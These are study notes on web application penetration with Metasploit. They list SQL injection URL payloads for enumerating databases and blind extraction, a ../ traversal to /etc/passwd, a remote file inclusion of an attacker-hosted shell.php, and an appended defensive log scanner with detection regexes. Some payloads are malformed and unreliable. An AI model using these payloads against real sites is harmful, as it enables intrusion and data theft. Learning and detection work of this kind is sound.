"Metasploit Penetration Testing Devil Training Camp" study notes, chapter four: web application penetration

Source: Internet
Author: User

Continuing with Metasploit. Writing notes helps me remember, so here is the main text.

II. Web Application Penetration Technology

1. Web application penetration basics

First, the main types of web application attacks (rough summary; check the details yourself):

    SQL injection: broadly divided into ordinary injection and blind injection.
    Cross-site scripting (XSS): stored XSS, reflected XSS and DOM-based XSS.
    Cross-site request forgery (CSRF): a script is injected via XSS; when the victim clicks it, the script forges a request in the victim's name.
    Broken session and authentication management: the identity verification mechanism has a flaw.
    Security misconfiguration: mistakes by developers and administrators lead to vulnerabilities.
    Insecure password storage: passwords are stored in plaintext or with an encryption algorithm that is too weak.
    Insecure direct object references: attackers abuse the site's own read functionality to access arbitrary documents and steal sensitive files.
    Failure to restrict URL access: private pages can be reached without authentication.
    Insufficient transport layer protection: without a protection mechanism such as SSL/TLS, attackers can read sensitive data directly off the wire.
    Unvalidated redirects and forwards: attackers trick the victim through an unvalidated redirect page and steal the victim's sensitive data.

Metasploit has relatively few modules for attacking web applications, but the Kali penetration system ships many excellent web penetration tools that make up for this.

1.1 Metasploit auxiliary modules

Auxiliary modules all live under modules/auxiliary/. The WMAP web scanner is built into recent Metasploit versions; it lets the user configure auxiliary modules and run a centralized scan of a site.

1.2 Exploit modules

Exploit modules are scattered across several folders under modules/. There are modules for mainstream CMS vulnerabilities and for a variety of database vulnerabilities, and the framework also includes webshells to operate with after a successful exploit. Metasploit has interfaces to web vulnerability scanners such as w3af, sqlmap, wXf, XSSF and BeEF for better detection.

2. Web application vulnerability scanning and detection

2.1 Open source web application vulnerability scanners

    wapiti: high scan accuracy for SQL injection.
    w3af: excellent overall, with high accuracy.
    Sandcat Free Edition: high accuracy for XSS cross-site vulnerabilities.

2.2 The scanning tool w3af

w3af is divided into eight plugin types: discovery (finds HTTP information and probes the server, database and so on), audit (probes for vulnerabilities), grep (captures information from responses), attack (reads the scan results and attempts an attack through the plugin), output (writes the scan results), mangle (modifies request and response information), evasion (bypasses intrusion detection systems) and bruteforce (cracks pages that require authentication; supports HTTP Basic authentication and form login). Usage is not covered in detail here.

2.3 SQL injection vulnerability detection

sqlmap is an excellent scanner for SQL injection vulnerabilities. Its usage is not covered in detail here. Metasploit has been integrated with this tool.

2.4 XSS vulnerability detection

XSSer and xssfuzz, or the w3af integrated with Metasploit.

2.5 Web application vulnerability detection

wXf is a web vulnerability scanning and attack framework that follows the design of the Metasploit framework. It is not included in Kali and has to be downloaded separately.

3. Web application penetration testing

3.1 SQL injection analysis

Only a simple explanation here; look up the more advanced material yourself.

Ordinary injection:

    http://www.xxx.net/do/plus/view.php?aid=236896'
        // Checks whether an injection point exists; if ' is filtered, this test cannot tell.
    http://www.xxx.net/do/plus/view.php?aid=236896 and 1=2 union select 1,2,3,4,5,6,7--
        // The trailing -- comments out the rest of the statement to avoid a syntax error. This statement determines the number of columns: if an error is returned the guess is wrong, so keep adding numbers until it succeeds.
    http://www.xxx.net/do/plus/view.php?aid=236896 and 1=2 union select 1,version(),database(),user(),5,6,7,8,9,10 from table_name--
        // Returns the database version, the current database and the user name.
    http://www.xxx.net/do/plus/view.php?aid=236896 and 1=2 union select 1,version(),database(),user(),5,6,7,8,group_concat(schema_name) from information_schema.schemata--
        // Lists all databases (schemas).
    http://www.xxx.net/do/plus/view.php?aid=236896 and 1=2 union select 1,version(),database(),user(),5,6,7,8,group_concat(table_name) from information_schema.tables where table_schema=database()--
        // Lists all tables in the current database.
    http://www.xxx.net/do/plus/view.php?aid=236896 and 1=2 union select 1,version(),database(),user(),5,6,7,8,group_concat(column_name) from information_schema.columns where table_name=<table name as hex>--
        // Lists the columns of that table.

Blind injection (this is character-by-character guessing):

    http://www.xxx.net/do/plus/view.php?aid=236896 and length(database())>1
    http://www.xxx.net/do/plus/view.php?aid=236896 and length(database())>2
        If the first request returns without error and the second one errors, the database name is two characters long, and so on.
    http://www.xxx.net/do/plus/view.php?aid=236896 and ascii(substring(), ())>97
    http://www.xxx.net/do/plus/view.php?aid=236896 and ascii(substring(), ())>98
        If the first request returns without error and the second one errors, the ASCII code of the first character of the database name is 98, and so on.
    http://www.xxx.net/do/plus/view.php?aid=236896 and (select count(table_name) from information_schema where table_schema=database())>15
        This gives the number of tables in the database. The rest follows the same pattern and is not listed.

3.2 Cross-site scripting case analysis

Cross-site scripting attack framework (XSSF); look up the specific tutorials yourself.

3.3 Command injection case analysis

The usual process: a vulnerability in an application or plugin is found by scanning, then exploit code for it is found online and used to get a webshell. If your skills are good enough, you can write your own code, or convert existing code into a Metasploit exploit module and payload module. Practice this on your own; my ability is limited... A tutorial will come once my level improves...

3.4 File inclusion and file upload vulnerabilities

File inclusion covers local file inclusion (LFI) and remote file inclusion (RFI).

    http://www.xxx.com/?page=../../../../etc/passwd
        // "../" steps out of the current directory; try a few more levels.
    http://www.xxx.com/?page=www.ooo.com/shell.php
        // shell.php is a shell prepared in advance on a remote host.

File upload vulnerabilities arise because the site does not rigorously check and filter uploaded files, so a malicious file can be submitted to obtain a webshell. For upload bypass techniques, look them up yourself.
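From the defender's side, the request shapes walked through in sections 3.1 and 3.4 (quote probe, UNION column counting, information_schema enumeration, boolean blind probes, ../ traversal and remote includes) are easy to recognise in web server access logs. The following Python scanner is an added example and not part of the original notes; the log lines, IP addresses and hostnames in it are constructed, and the rule set is my own, not a tool's.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original notes); the
# request shapes mirror the probes the notes walk through.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /do/plus/view.php?aid=236896 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /do/plus/view.php?aid=236896%27 HTTP/1.1" 500 312
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /do/plus/view.php?aid=236896%20and%201=2%20union%20select%201,2,3,4,5,6,7-- HTTP/1.1" 200 5200
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /do/plus/view.php?aid=236896%20and%20length(database())%3E1 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /?page=../../../../etc/passwd HTTP/1.1" 200 1800
10.0.0.5 - - [01/Jan/2024:10:00:06 +0000] "GET /?page=http://www.ooo.com/shell.php HTTP/1.1" 200 90
10.0.0.7 - - [01/Jan/2024:10:00:07 +0000] "GET /index.php?page=about HTTP/1.1" 200 4000
"""

# Common Log Format: client ip, identity, user, [timestamp], "METHOD URI PROTO", status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')

# Each rule: (label, regex applied to the URL-decoded, lower-cased request URI)
RULES = [
    ("sqli-union", re.compile(r"\bunion\b[\s/*]+(all\s+)?select\b")),
    ("sqli-schema-enum", re.compile(r"information_schema\.|group_concat\(")),
    ("sqli-blind-boolean", re.compile(r"\band\s+(length|ascii|substring|\(select\s+count)\s*\(")),
    ("sqli-quote-probe", re.compile(r"=\d+'(\s|$|&)")),
    ("lfi-traversal", re.compile(r"(\.\./|\.\.\\){2,}|/etc/passwd")),
    ("rfi-remote-include", re.compile(r"[?&]\w+=(https?|ftp)://")),
]

def classify_uri(uri):
    """Return the list of rule labels that match one raw request URI."""
    decoded = unquote_plus(unquote_plus(uri)).lower()  # double-decode defeats %2527-style nesting
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)       # inline SQL comments are often used as spaces
    return [label for label, rx in RULES if rx.search(decoded)]

def scan_log(text):
    """Parse log lines and return (ip, status, uri, labels) for every flagged request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in Common Log Format
        labels = classify_uri(m["uri"])
        if labels:
            hits.append((m["ip"], int(m["status"]), m["uri"], labels))
    return hits

if __name__ == "__main__":
    for ip, status, uri, labels in scan_log(SAMPLE_LOG):
        print(f"{ip} {status} {','.join(labels)} {uri}")
```

Note that the status code is kept alongside the labels: a 500 after a quote probe followed by 200s on UNION requests is exactly the success-or-error sequence the notes describe, which is more useful to an analyst than any single matching line.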
